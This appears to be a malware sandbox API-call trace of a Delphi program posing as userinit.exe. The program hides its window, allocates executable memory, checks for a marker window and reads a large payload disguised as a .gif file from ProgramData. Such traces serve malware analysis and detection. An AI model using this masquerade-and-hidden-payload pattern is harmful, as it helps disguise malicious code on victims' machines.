[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0167.663] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0167.664] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x1afa64, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0167.664] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0167.664] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0167.664] GetVersion () returned 0x1db10106
[0167.664] GetCurrentProcessId () returned 0x844
[0167.664] GlobalAddAtomA (lpString="Delphi00000844") returned 0xc10f
[0167.664] GetCurrentThreadId () returned 0x84c
[0167.664] GlobalAddAtomA (lpString="ControlOfs004000000000084C") returned 0xc10e
[0167.665] RegisterClipboardFormatA (lpszFormat="ControlOfs004000000000084C") returned 0xc17e
[0167.665] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0167.665] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0167.665] GetSystemMetrics (nIndex=19) returned 1
[0167.673] GetSystemMetrics (nIndex=75) returned 1
[0167.673] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1181310, fWinIni=0x0 | out: pvParam=0x1181310) returned 1
[0167.673] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0167.673] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0167.673] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0xc0215
[0167.673] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0167.673] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0167.673] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0167.673] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0xe022d
[0167.673] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0xb0229
[0167.674] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0xa020d
[0167.674] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0xc0201
[0167.674] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0xb01f9
[0167.674] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0xc01f3
[0167.674] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0167.675] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0167.675] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0167.675] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0167.675] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0167.675] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0167.675] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0167.675] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0167.675] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0167.675] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0167.675] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0167.675] GetDC (hWnd=0x0) returned 0x6f01071a
[0167.675] GetDeviceCaps (hdc=0x6f01071a, index=90) returned 96
[0167.675] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0167.675] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0167.675] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x118155c) returned 1
[0167.675] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x1afdcf, fWinIni=0x0 | out: pvParam=0x1afdcf) returned 1
[0167.675] CreateFontIndirectA (lplf=0x1afdcf) returned 0x2e0a089f
[0167.675] GetObjectA (in: h=0x2e0a089f, c=60, pv=0x1afbc0 | out: pv=0x1afbc0) returned 60
[0167.675] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x1afc7b, fWinIni=0x0 | out: pvParam=0x1afc7b) returned 1
[0167.676] CreateFontIndirectA (lplf=0x1afd57) returned 0x850a0838
[0167.676] GetObjectA (in: h=0x850a0838, c=60, pv=0x1afbc0 | out: pv=0x1afbc0) returned 60
[0167.676] CreateFontIndirectA (lplf=0x1afd1b) returned 0x6e0a0837
[0167.676] GetObjectA (in: h=0x6e0a0837, c=60, pv=0x1afbc0 | out: pv=0x1afbc0) returned 60
[0167.676] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0167.676] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x1afd2f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0167.676] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x1afd2f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0167.676] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xe0000
[0167.676] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x1afce4 | out: lpWndClass=0x1afce4) returned 0
[0167.676] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0167.676] GetSystemMetrics (nIndex=0) returned 1440
[0167.676] GetSystemMetrics (nIndex=1) returned 900
[0167.676] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xe01e8
[0167.681] SetWindowLongA (hWnd=0xe01e8, nIndex=-4, dwNewLong=921583) returned 4219500
[0167.681] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0167.681] SendMessageA (hWnd=0xe01e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0167.681] DefWindowProcA (hWnd=0xe01e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0167.694] DefWindowProcA (hWnd=0xe01e8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xc01c5
[0167.695] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0167.695] SetClassLongA (hWnd=0xe01e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0167.696] GetSystemMenu (hWnd=0xe01e8, bRevert=0) returned 0x901af
[0167.698] DeleteMenu (hMenu=0x901af, uPosition=0xf030, uFlags=0x0) returned 1
[0167.698] DeleteMenu (hMenu=0x901af, uPosition=0xf000, uFlags=0x0) returned 1
[0167.698] DeleteMenu (hMenu=0x901af, uPosition=0xf010, uFlags=0x0) returned 1
[0167.698] GetKeyboardLayoutList (in: nBuff=64, lpList=0x1afcb0 | out: lpList=0x1afcb0) returned 1
[0167.699] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0167.700] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0167.700] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d720000
[0167.700] GetProcAddress (hModule=0x6d720000, lpProcName="InitializeFlatSB") returned 0x6d75266f
[0167.700] GetProcAddress (hModule=0x6d720000, lpProcName="UninitializeFlatSB") returned 0x6d752542
[0167.701] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollProp") returned 0x6d751d29
[0167.701] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollProp") returned 0x6d75238d
[0167.701] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7520c9
[0167.701] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d751fdb
[0167.701] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollRange") returned 0x6d751e8d
[0167.701] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d751f0f
[0167.701] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollPos") returned 0x6d751ccd
[0167.701] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollPos") returned 0x6d75216d
[0167.701] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7522be
[0167.701] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7521e2
[0167.701] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0167.702] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0167.702] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0167.702] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0167.702] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0167.702] GetCurrentThreadId () returned 0x84c
[0167.702] GlobalAddAtomA (lpString="WndProcPtr004000000000084C") returned 0xc10d
[0167.702] VirtualAlloc (lpAddress=0x1184000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1184000
[0167.702] ShowWindow (hWnd=0xe01e8, nCmdShow=0) returned 0
[0167.703] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0167.703] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0167.703] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1afa30*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1afa30*=0) returned 0x0
[0167.703] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1afa28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1afa28*=0) returned 0x0
[0167.703] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1afa28*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1afa28*=0) returned 0x10be00
[0167.703] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1afa28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1afa28*=0) returned 0x0
[0167.704] GlobalLock (hMem=0x1280004) returned 0x2200020
[0167.704] ReadFile (in: hFile=0x98, lpBuffer=0x2200020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x1afa44, lpOverlapped=0x0 | out: lpBuffer=0x2200020*, lpNumberOfBytesRead=0x1afa44*=0x10be00, lpOverlapped=0x0) returned 1
[0167.741] CloseHandle (hObject=0x98) returned 1
[0167.742] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.742] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.742] GlobalUnlock (hMem=0x128000c) returned 0
[0167.742] GlobalReAlloc (hMem=0x128000c, dwBytes=0x4000, uFlags=0x2) returned 0x128000c
[0167.742] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.743] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.743] GlobalUnlock (hMem=0x128000c) returned 0
[0167.743] GlobalReAlloc (hMem=0x128000c, dwBytes=0x6000, uFlags=0x2) returned 0x128000c
[0167.743] GlobalLock (hMem=0x128000c) returned 0x2ca820
[0167.744] GlobalHandle (pMem=0x2ca820) returned 0x128000c
[0167.744] GlobalUnlock (hMem=0x128000c) returned 0
[0167.744] GlobalReAlloc (hMem=0x128000c, dwBytes=0x8000, uFlags=0x2) returned 0x128000c
[0167.744] GlobalLock (hMem=0x128000c) returned 0x2d0830
[0167.745] GlobalHandle (pMem=0x2d0830) returned 0x128000c
[0167.745] GlobalUnlock (hMem=0x128000c) returned 0
[0167.745] GlobalReAlloc (hMem=0x128000c, dwBytes=0xa000, uFlags=0x2) returned 0x128000c
[0167.745] GlobalLock (hMem=0x128000c) returned 0x2d0830
[0167.745] GlobalHandle (pMem=0x2d0830) returned 0x128000c
[0167.745] GlobalUnlock (hMem=0x128000c) returned 0
[0167.746] GlobalReAlloc (hMem=0x128000c, dwBytes=0xc000, uFlags=0x2) returned 0x128000c
[0167.746] GlobalLock (hMem=0x128000c) returned 0x2da840
[0167.747] GlobalHandle (pMem=0x2da840) returned 0x128000c
[0167.747] GlobalUnlock (hMem=0x128000c) returned 0
[0167.747] GlobalReAlloc (hMem=0x128000c, dwBytes=0xe000, uFlags=0x2) returned 0x128000c
[0167.747] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.747] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.747] GlobalUnlock (hMem=0x128000c) returned 0
[0167.747] GlobalReAlloc (hMem=0x128000c, dwBytes=0x10000, uFlags=0x2) returned 0x128000c
[0167.747] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.748] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.748] GlobalUnlock (hMem=0x128000c) returned 0
[0167.748] GlobalReAlloc (hMem=0x128000c, dwBytes=0x12000, uFlags=0x2) returned 0x128000c
[0167.748] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.748] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.748] GlobalUnlock (hMem=0x128000c) returned 0
[0167.748] GlobalReAlloc (hMem=0x128000c, dwBytes=0x14000, uFlags=0x2) returned 0x128000c
[0167.748] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.749] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.749] GlobalUnlock (hMem=0x128000c) returned 0
[0167.749] GlobalReAlloc (hMem=0x128000c, dwBytes=0x16000, uFlags=0x2) returned 0x128000c
[0167.749] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.749] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.749] GlobalUnlock (hMem=0x128000c) returned 0
[0167.749] GlobalReAlloc (hMem=0x128000c, dwBytes=0x18000, uFlags=0x2) returned 0x128000c
[0167.749] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.750] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.750] GlobalUnlock (hMem=0x128000c) returned 0
[0167.750] GlobalReAlloc (hMem=0x128000c, dwBytes=0x1a000, uFlags=0x2) returned 0x128000c
[0167.750] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.750] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.750] GlobalUnlock (hMem=0x128000c) returned 0
[0167.750] GlobalReAlloc (hMem=0x128000c, dwBytes=0x1c000, uFlags=0x2) returned 0x128000c
[0167.750] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.751] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.751] GlobalUnlock (hMem=0x128000c) returned 0
[0167.751] GlobalReAlloc (hMem=0x128000c, dwBytes=0x1e000, uFlags=0x2) returned 0x128000c
[0167.751] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.751] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.751] GlobalUnlock (hMem=0x128000c) returned 0
[0167.751] GlobalReAlloc (hMem=0x128000c, dwBytes=0x20000, uFlags=0x2) returned 0x128000c
[0167.751] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.752] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.752] GlobalUnlock (hMem=0x128000c) returned 0
[0167.752] GlobalReAlloc (hMem=0x128000c, dwBytes=0x22000, uFlags=0x2) returned 0x128000c
[0167.753] GlobalLock (hMem=0x128000c) returned 0x2e6820
[0167.754] GlobalHandle (pMem=0x2e6820) returned 0x128000c
[0167.754] GlobalUnlock (hMem=0x128000c) returned 0
[0167.754] GlobalReAlloc (hMem=0x128000c, dwBytes=0x24000, uFlags=0x2) returned 0x128000c
[0167.754] GlobalLock (hMem=0x128000c) returned 0x2e6820
[0167.754] GlobalHandle (pMem=0x2e6820) returned 0x128000c
[0167.754] GlobalUnlock (hMem=0x128000c) returned 0
[0167.754] GlobalReAlloc (hMem=0x128000c, dwBytes=0x26000, uFlags=0x2) returned 0x128000c
[0167.756] GlobalLock (hMem=0x128000c) returned 0x30a830
[0167.757] GlobalHandle (pMem=0x30a830) returned 0x128000c
[0167.757] GlobalUnlock (hMem=0x128000c) returned 0
[0167.757] GlobalReAlloc (hMem=0x128000c, dwBytes=0x28000, uFlags=0x2) returned 0x128000c
[0167.757] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.757] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.757] GlobalUnlock (hMem=0x128000c) returned 0
[0167.757] GlobalReAlloc (hMem=0x128000c, dwBytes=0x2a000, uFlags=0x2) returned 0x128000c
[0167.757] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.758] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.758] GlobalUnlock (hMem=0x128000c) returned 0
[0167.758] GlobalReAlloc (hMem=0x128000c, dwBytes=0x2c000, uFlags=0x2) returned 0x128000c
[0167.758] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.758] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.758] GlobalUnlock (hMem=0x128000c) returned 0
[0167.758] GlobalReAlloc (hMem=0x128000c, dwBytes=0x2e000, uFlags=0x2) returned 0x128000c
[0167.758] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.759] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.759] GlobalUnlock (hMem=0x128000c) returned 0
[0167.759] GlobalReAlloc (hMem=0x128000c, dwBytes=0x30000, uFlags=0x2) returned 0x128000c
[0167.759] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.759] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.759] GlobalUnlock (hMem=0x128000c) returned 0
[0167.759] GlobalReAlloc (hMem=0x128000c, dwBytes=0x32000, uFlags=0x2) returned 0x128000c
[0167.759] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.760] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.760] GlobalUnlock (hMem=0x128000c) returned 0
[0167.760] GlobalReAlloc (hMem=0x128000c, dwBytes=0x34000, uFlags=0x2) returned 0x128000c
[0167.760] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.760] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.760] GlobalUnlock (hMem=0x128000c) returned 0
[0167.760] GlobalReAlloc (hMem=0x128000c, dwBytes=0x36000, uFlags=0x2) returned 0x128000c
[0167.760] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.761] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.761] GlobalUnlock (hMem=0x128000c) returned 0
[0167.761] GlobalReAlloc (hMem=0x128000c, dwBytes=0x38000, uFlags=0x2) returned 0x128000c
[0167.761] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.761] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.761] GlobalUnlock (hMem=0x128000c) returned 0
[0167.761] GlobalReAlloc (hMem=0x128000c, dwBytes=0x3a000, uFlags=0x2) returned 0x128000c
[0167.761] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.762] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.762] GlobalUnlock (hMem=0x128000c) returned 0
[0167.762] GlobalReAlloc (hMem=0x128000c, dwBytes=0x3c000, uFlags=0x2) returned 0x128000c
[0167.762] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.762] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.762] GlobalUnlock (hMem=0x128000c) returned 0
[0167.762] GlobalReAlloc (hMem=0x128000c, dwBytes=0x3e000, uFlags=0x2) returned 0x128000c
[0167.762] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.763] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.763] GlobalUnlock (hMem=0x128000c) returned 0
[0167.763] GlobalReAlloc (hMem=0x128000c, dwBytes=0x40000, uFlags=0x2) returned 0x128000c
[0167.763] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.763] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.763] GlobalUnlock (hMem=0x128000c) returned 0
[0167.763] GlobalReAlloc (hMem=0x128000c, dwBytes=0x42000, uFlags=0x2) returned 0x128000c
[0167.763] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.764] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.764] GlobalUnlock (hMem=0x128000c) returned 0
[0167.764] GlobalReAlloc (hMem=0x128000c, dwBytes=0x44000, uFlags=0x2) returned 0x128000c
[0167.764] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.764] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.764] GlobalUnlock (hMem=0x128000c) returned 0
[0167.764] GlobalReAlloc (hMem=0x128000c, dwBytes=0x46000, uFlags=0x2) returned 0x128000c
[0167.764] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.765] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.765] GlobalUnlock (hMem=0x128000c) returned 0
[0167.765] GlobalReAlloc (hMem=0x128000c, dwBytes=0x48000, uFlags=0x2) returned 0x128000c
[0167.765] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.765] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.765] GlobalUnlock (hMem=0x128000c) returned 0
[0167.765] GlobalReAlloc (hMem=0x128000c, dwBytes=0x4a000, uFlags=0x2) returned 0x128000c
[0167.765] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.766] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.766] GlobalUnlock (hMem=0x128000c) returned 0
[0167.766] GlobalReAlloc (hMem=0x128000c, dwBytes=0x4c000, uFlags=0x2) returned 0x128000c
[0167.766] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.766] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.766] GlobalUnlock (hMem=0x128000c) returned 0
[0167.766] GlobalReAlloc (hMem=0x128000c, dwBytes=0x4e000, uFlags=0x2) returned 0x128000c
[0167.766] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.767] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.767] GlobalUnlock (hMem=0x128000c) returned 0
[0167.767] GlobalReAlloc (hMem=0x128000c, dwBytes=0x50000, uFlags=0x2) returned 0x128000c
[0167.767] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.767] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.767] GlobalUnlock (hMem=0x128000c) returned 0
[0167.767] GlobalReAlloc (hMem=0x128000c, dwBytes=0x52000, uFlags=0x2) returned 0x128000c
[0167.767] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.768] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.768] GlobalUnlock (hMem=0x128000c) returned 0
[0167.768] GlobalReAlloc (hMem=0x128000c, dwBytes=0x54000, uFlags=0x2) returned 0x128000c
[0167.768] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.768] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.768] GlobalUnlock (hMem=0x128000c) returned 0
[0167.768] GlobalReAlloc (hMem=0x128000c, dwBytes=0x56000, uFlags=0x2) returned 0x128000c
[0167.768] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.769] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.769] GlobalUnlock (hMem=0x128000c) returned 0
[0167.769] GlobalReAlloc (hMem=0x128000c, dwBytes=0x58000, uFlags=0x2) returned 0x128000c
[0167.769] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.769] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.769] GlobalUnlock (hMem=0x128000c) returned 0
[0167.769] GlobalReAlloc (hMem=0x128000c, dwBytes=0x5a000, uFlags=0x2) returned 0x128000c
[0167.769] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.770] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.770] GlobalUnlock (hMem=0x128000c) returned 0
[0167.770] GlobalReAlloc (hMem=0x128000c, dwBytes=0x5c000, uFlags=0x2) returned 0x128000c
[0167.770] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.770] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.770] GlobalUnlock (hMem=0x128000c) returned 0
[0167.770] GlobalReAlloc (hMem=0x128000c, dwBytes=0x5e000, uFlags=0x2) returned 0x128000c
[0167.770] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.771] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.771] GlobalUnlock (hMem=0x128000c) returned 0
[0167.771] GlobalReAlloc (hMem=0x128000c, dwBytes=0x60000, uFlags=0x2) returned 0x128000c
[0167.771] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.772] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.772] GlobalUnlock (hMem=0x128000c) returned 0
[0167.772] GlobalReAlloc (hMem=0x128000c, dwBytes=0x62000, uFlags=0x2) returned 0x128000c
[0167.772] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.773] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.773] GlobalUnlock (hMem=0x128000c) returned 0
[0167.773] GlobalReAlloc (hMem=0x128000c, dwBytes=0x64000, uFlags=0x2) returned 0x128000c
